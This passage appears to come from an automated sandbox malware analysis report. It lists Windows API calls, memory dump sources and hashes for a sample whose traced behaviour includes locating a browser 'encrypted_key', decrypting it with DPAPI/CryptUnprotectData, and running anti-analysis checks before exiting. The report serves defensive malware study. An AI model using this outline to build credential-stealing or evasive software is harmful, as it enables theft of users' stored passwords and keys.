                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B314A5
                                                  • __aulldiv.LIBCMT ref: 00B314BF
                                                  • __aulldiv.LIBCMT ref: 00B314CD
                                                  • ExitProcess.KERNEL32 ref: 00B314FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                  • String ID: @
                                                  • API String ID: 3404098578-2766056989
                                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction ID: 60c82b1f7c0106b4d904ba01f1cbfc74ea250104a37c48e5cbfdf0a4229111c5
                                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                  • Instruction Fuzzy Hash: E801FBB0980308BAEF10DBD8CC89B9DBABCEB50705F208888F605762C1D7B496458B55
                                                  APIs
                                                  • memcmp.MSVCRT(?,00421264,00000003), ref: 00B3A094
                                                    • Part of subcall function 00B4AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B4AA4D
                                                    • Part of subcall function 00B40CC7: memset.MSVCRT ref: 00B40E83
                                                    • Part of subcall function 00B40CC7: lstrcat.KERNEL32(?,00000000), ref: 00B40E9C
                                                    • Part of subcall function 00B40CC7: lstrcat.KERNEL32(?,00420D7C), ref: 00B40EAE
                                                    • Part of subcall function 00B40CC7: lstrcat.KERNEL32(?,00000000), ref: 00B40EC4
                                                    • Part of subcall function 00B40CC7: lstrcat.KERNEL32(?,00420D80), ref: 00B40ED6
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                  • memcmp.MSVCRT(?,00421114,00000003), ref: 00B3A116
                                                  • memset.MSVCRT ref: 00B3A14F
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B3A1A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                  • String ID: @
                                                  • API String ID: 1977917189-2766056989
                                                  • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                  • Instruction ID: 0aca904755d8e3cd07c57759d2ec384adb958612dedd679d487028132eb4b5ae
                                                  • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                  • Instruction Fuzzy Hash: 55615A70A40248EBCB18EFA8CD86FED77B5AF44300F608158F94AAB591DB746B05CB42
                                                  APIs
                                                  • strtok_s.MSVCRT ref: 00410DB8
                                                  • strtok_s.MSVCRT ref: 00410EFD
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00849958,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strtok_s$lstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 348468850-0
                                                  • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                  • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                                  • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                  • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                  • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                    • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                    • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                    • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                    • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                  • String ID: $"encrypted_key":"$DPAPI
                                                  • API String ID: 3731072634-738592651
                                                  • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                  • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                  • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                  • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CodeInfoPageValidmemset
                                                  • String ID:
                                                  • API String ID: 703783727-0
                                                  • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                  • Instruction ID: 593b7f37be13af5a8d4df06b8f9a2c695a4f8cb8fef10d6f88b9cd8fd4dda10d
                                                  • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                  • Instruction Fuzzy Hash: 5B312630A062919EDBA58F74C8942B9BFE0DB06710B1881FAD981CF192D328CA09F761
                                                  APIs
                                                  • GetSystemTime.KERNEL32(?), ref: 00B46BD3
                                                  • sscanf.NTDLL ref: 00B46C00
                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B46C19
                                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B46C27
                                                  • ExitProcess.KERNEL32 ref: 00B46C41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$System$File$ExitProcesssscanf
                                                  • String ID:
                                                  • API String ID: 2533653975-0
                                                  • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                  • Instruction ID: 9ad128ff6db51850cd9159f0dfe86355b7587ebb756a4c5718dd222b6f31f6c9
                                                  • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                  • Instruction Fuzzy Hash: CE21E7B5D04208ABCF08EFE4D945AEEB7F6FF49300F04856EE406A3250EB345604CB65
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                                  • wsprintfA.USER32 ref: 00418850
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocProcesslstrcpywsprintf
                                                  • String ID: Fs$%dx%d
                                                  • API String ID: 2716131235-1170756869
                                                  • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                  • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                                  • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                  • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B4809E
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B480A5
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 00B480C5
                                                  • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 00B480E6
                                                  • RegCloseKey.ADVAPI32(?), ref: 00B480F9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3225020163-0
                                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction ID: b840de1c75ee2bc3f6bf9afa4f60a8bf2109d3816d3e72be12e7195a26a7abe3
                                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction Fuzzy Hash: BF113DB5A84209BBD710CFD4DD4AFBFB7B9EB09710F10415AF615A7280CBB559018BA1
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                                  • RegOpenKeyExA.ADVAPI32(80000002,00845FA8,00000000,00020119,?), ref: 00417E5E
                                                  • RegQueryValueExA.ADVAPI32(?,008797B8,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                                  • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3466090806-0
                                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                  • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B4799B
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B479A2
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00B47920), ref: 00B479C2
                                                  • RegQueryValueExA.ADVAPI32(00B47920,00420AAC,00000000,00000000,?,000000FF), ref: 00B479E1
                                                  • RegCloseKey.ADVAPI32(00B47920), ref: 00B479EB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3225020163-0
                                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction ID: 8b1d07d9ba9185af329870c4ad6e67d2214aa05727453c4f0837f30f772f3ae9
                                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction Fuzzy Hash: A401F4B9A80308BFEB10DFE4DC4AFAEB7B9EB44701F104559FA05A7281DB7556008F51
                                                  APIs
                                                  • StrStrA.SHLWAPI(00879090,?,?,?,0041140C,?,00879090,00000000), ref: 0041926C
                                                  • lstrcpyn.KERNEL32(0064AB88,00879090,00879090,?,0041140C,?,00879090), ref: 00419290
                                                  • lstrlenA.KERNEL32(?,?,0041140C,?,00879090), ref: 004192A7
                                                  • wsprintfA.USER32 ref: 004192C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpynlstrlenwsprintf
                                                  • String ID: %s%s
                                                  • API String ID: 1206339513-3252725368
                                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3151B
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B31522
                                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B3153E
                                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B3155C
                                                  • RegCloseKey.ADVAPI32(?), ref: 00B31566
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3225020163-0
                                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction ID: 15444ef4e91050efc3cdbc1a2c9b6e6085b183a99ca03ac14246c93e07a6533f
                                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction Fuzzy Hash: 620131BDA40208BFDB10DFE4DC49FAEB7BDEB48701F108159FA0597280D6749A018F91
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                  • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                  • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 3466090806-0
                                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                  • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                                  APIs
                                                  • __getptd.LIBCMT ref: 00B4C9B5
                                                    • Part of subcall function 00B4C206: __getptd_noexit.LIBCMT ref: 00B4C209
                                                    • Part of subcall function 00B4C206: __amsg_exit.LIBCMT ref: 00B4C216
                                                  • __getptd.LIBCMT ref: 00B4C9CC
                                                  • __amsg_exit.LIBCMT ref: 00B4C9DA
                                                  • __lock.LIBCMT ref: 00B4C9EA
                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00B4C9FE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                  • String ID:
                                                  • API String ID: 938513278-0
                                                  • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                  • Instruction ID: c2fe049568c228c38863cc0e6fb19fa2939bdaf782d91b4738e4520bbf315f5c
                                                  • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                  • Instruction Fuzzy Hash: C2F09632A42314BBD7A1BBA95407B1D3BE09F00B24F1401CAF514A61D2DBA45B40F75D
                                                  APIs
                                                  • __getptd.LIBCMT ref: 0041C74E
                                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                  • __getptd.LIBCMT ref: 0041C765
                                                  • __amsg_exit.LIBCMT ref: 0041C773
                                                  • __lock.LIBCMT ref: 0041C783
                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                  • String ID:
                                                  • API String ID: 938513278-0
                                                  • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                  • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                  • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                  • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                  APIs
                                                  • StrCmpCA.SHLWAPI(00000000,00849BE8), ref: 0041079A
                                                  • StrCmpCA.SHLWAPI(00000000,00849BB8), ref: 00410866
                                                  • StrCmpCA.SHLWAPI(00000000,00849C18), ref: 0041099D
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy
                                                  • String ID: `_A
                                                  • API String ID: 3722407311-2339250863
                                                  • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                  • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                                  • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                  • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                                  APIs
                                                  • StrCmpCA.SHLWAPI(00000000,00849BE8), ref: 0041079A
                                                  • StrCmpCA.SHLWAPI(00000000,00849BB8), ref: 00410866
                                                  • StrCmpCA.SHLWAPI(00000000,00849C18), ref: 0041099D
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy
                                                  • String ID: `_A
                                                  • API String ID: 3722407311-2339250863
                                                  • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                  • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                                  • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                  • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B468CA
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
